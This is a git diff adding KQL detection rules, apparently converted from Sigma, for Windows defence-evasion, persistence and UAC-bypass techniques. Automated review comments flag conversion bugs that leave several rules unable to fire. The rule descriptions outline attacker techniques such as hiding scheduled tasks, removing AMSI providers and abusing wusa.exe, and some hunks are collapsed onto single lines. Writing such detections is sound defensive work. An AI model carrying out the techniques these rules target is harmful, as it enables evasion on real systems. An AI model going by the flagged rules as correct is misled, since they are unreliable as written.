+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
new file mode 100644
index 00000000..813a859f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
@@ -0,0 +1,10 @@
+// Title: Writing Of Malicious Files To The Fonts Folder
+// Author: Sreeman
+// Date: 2020-04-21
+// Level: medium
+// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
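Review bot: `ProcessCommandLine contains "C:\\Windows\\Fonts\\"` in the `| where` line hard-codes the drive letter, unlike the drive-agnostic `:\\Windows\\Temp\\` form used in other rules of this diff, so the rule depends on the system root being on C:; `ProcessCommandLine contains ":\\Windows\\Fonts\\"` keeps the intent. The extension list also carries entries that subsume others (`".vb"` already matches the later `".vbs"`, and `".ps"` matches any `.ps*` name), which is harmless at query time but worth pruning at the Sigma source so that the generated list stays readable. "privillege" in the description is an upstream typo that will be reintroduced on every regeneration unless it is fixed in the Sigma rule.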
diff --git a/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
new file mode 100644
index 00000000..57b5d581
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Wscript Shell Run In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
new file mode 100644
index 00000000..8975570c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: WSL Child Process Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-23
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
new file mode 100644
index 00000000..9a351895
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
@@ -0,0 +1,12 @@
+// Title: WSL Kali-Linux Usage
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects the use of Kali Linux through Windows Subsystem for Linux
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister "))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
new file mode 100644
index 00000000..e708dda6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
@@ -0,0 +1,11 @@
+// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-26
+// Level: high
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
+// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
new file mode 100644
index 00000000..6204c9b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
@@ -0,0 +1,12 @@
+// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Legitimate ".xbap" being executed via "PresentationHost"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
new file mode 100644
index 00000000..09ee5359
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
@@ -0,0 +1,15 @@
+// Title: XSL Script Execution Via WMIC.EXE
+// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
+// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
+// - Static format arguments - https://petri.com/command-line-wmi-part-3
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
new file mode 100644
index 00000000..f68ca9a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
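Review bot: The image check in the `| where` line is `FolderPath endswith "\\wmic.exe"` alone, whereas the other wmic rules in this diff (windows_hotfix_updates_reconnaissance_via_wmic_exe.kql and wmic_remote_command_execution.kql) also accept `ProcessVersionInfoOriginalFileName =~ "wmic.exe"`, so this rule alone is tied to the on-disk file name and has no fallback on the PE original filename. For consistency with its siblings: `(FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")`. If the upstream Sigma rule lacks an OriginalFileName selector, that is where the addition belongs so it survives regeneration.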
@@ -0,0 +1,13 @@
+// Title: Xwizard.EXE Execution From Non-Default Location
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-09-20
+// Level: high
+// Description: Detects the execution of Xwizard tool from a non-default directory.
+// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Windows installed on non-C drive
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
new file mode 100644
index 00000000..fdb9d7c1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
@@ -0,0 +1,17 @@ +// Title: Potential Persistence Via Disk Cleanup Handler - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. +// The disk cleanup manager is part of the operating system. It displays the dialog box […] +// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate new entry added by windows + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey 
endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql new file mode 100644 index 00000000..4aefa0d1 --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql 
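Review bot: The trailing `*` in `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*"` is a literal character in a KQL string, not a wildcard, so no real key path can satisfy the predicate and this rule never fires. The Sigma wildcard should have become a prefix-style match such as `RegistryKey contains "\\Explorer\\VolumeCaches\\"` (or `matches regex`), and since this file is converter output the fix belongs in the conversion step rather than in the hunk. The same literal-`*` pattern appears in the `Tree*`, `Servers*`, `Names*`, `SYSTEM*`, `tcp*` and `wireshark-capture-file*` predicates of the Removal Of Index Value, Removal of Potential COM Hijacking, Removal Of SD Value, Terminal Server Client Connection History Cleared, Creation of a Local Hidden User Account, NetNTLM Downgrade Attack, New PortProxy Registry Entry Added and Registry Entries For Azorult Malware hunks. In the hidden-user-account and Azorult rules a second `endswith` on the same column makes the conjunction unsatisfiable outright.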
@@ -0,0 +1,12 @@ +// Title: Delete Defender Scan ShellEx Context Menu Registry Key +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: medium +// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely as this weakens defenses and normally would not be done even if using another AV. + +DeviceRegistryEvents +| where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql new file mode 100644 index 00000000..bc92427d --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql 
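Review bot: Nothing in the `where` clause restricts this rule to a deletion: it sits under `registry_delete` and its title says "Delete", yet it matches any DeviceRegistryEvents row whose RegistryKey contains `shellex\\ContextMenuHandlers\\EPP`, presumably including the key being created when Defender is installed. The logsource category should have been translated into an action predicate, e.g. `| where ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted") and RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and ...`, the form the Terminal Server Client hunk already uses. The same missing predicate affects the other `registry_delete` hunks here: Removal Of AMSI Provider Registry Keys, Removal Of Index Value, Removal of Potential COM Hijacking Registry Keys, Removal Of SD Value and RunMRU Registry Key Deletion. For the Index and SD rules the combination of no action filter with `contains "Index"` / `contains "SD"` likely turns every scheduled-task registration under TaskCache\Tree into a medium-severity alert, since registering a task presumably writes those same values.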
@@ -0,0 +1,12 @@ +// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators removing applications (should always be investigated) + +DeviceRegistryEvents +| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql new file mode 100644 index 00000000..ef8733f2 --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql 
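Review bot: `ActionType =~ "DeleteValue"` does not follow the `Registry*` naming the other hunks use for DeviceRegistryEvents action types (`RegistryKeyCreated`, `RegistryValueSet`, `RegistryKeyDeleted`, `RegistryValueDeleted`); it looks like the Sysmon EventType passed through untranslated, in which case this high-severity rule can never match. The Terminal Server Client hunk makes the mismatch visible by using both spellings in a single query. The same `"DeleteValue"` literal appears in the Terminal Server Client, Windows Recall and Narrator's Feedback-Hub hunks; the converter should map it to `ActionType =~ "RegistryValueDeleted"`.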
@@ -0,0 +1,12 @@ +// Title: Removal Of AMSI Provider Registry Keys +// Author: frack113 +// Date: 2021-06-07 +// Level: high +// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql new file mode 100644 index 00000000..01d28725 --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql @@ -0,0 +1,10 @@ +// Title: Removal Of Index Value to Hide Schedule Task - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index" \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql new file mode 100644 index 00000000..78e93068 --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql 
@@ -0,0 +1,13 @@ +// Title: Removal of Potential COM Hijacking Registry Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. +// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered + +DeviceRegistryEvents +| where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" 
and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql new file mode 100644 index 00000000..6896874e --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql 
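Review bot: The Avira exclusion compares `InitiatingProcessFolderPath` for equality (`in~`) against two directory names that end in a backslash, which no process image path can equal, so that filter never applies and the Avira events it was meant to suppress surface as alerts. The source rule presumably expressed this as a prefix match; `InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\"` is the form this same clause already uses for `C:\\Program Files\\`. The `endswith "C:\\Windows\\explorer.exe"` and `endswith "C:\\eclipse\\eclipse.exe"` predicates are harmless (an endswith on an absolute path degrades to equality) but point at the same operator-mapping issue in the converter.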
@@ -0,0 +1,10 @@ +// Title: Removal Of SD Value to Hide Schedule Task - Registry +// Author: Sittikorn S +// Date: 2022-04-15 +// Level: medium +// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql new file mode 100644 index 00000000..b7c5713f --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql @@ -0,0 +1,12 @@ +// Title: RunMRU Registry Key Deletion - Registry +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-25 +// Level: high +// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. +// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +// Adversaries may delete this key to cover their tracks after executing commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.003 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql new file mode 100644 index 00000000..03fc04ae --- /dev/null 
+++ b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql @@ -0,0 +1,10 @@ +// Title: Terminal Server Client Connection History Cleared - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-10-19 +// Level: high +// Description: Detects the deletion of registry keys containing the MSTSC connection history +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112 + +DeviceRegistryEvents +| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql new file mode 100644 index 00000000..983c3ae0 --- /dev/null +++ b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql 
@@ -0,0 +1,14 @@ +// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceRegistryEvents +| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql new file mode 100644 index 00000000..20c6db50 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql 
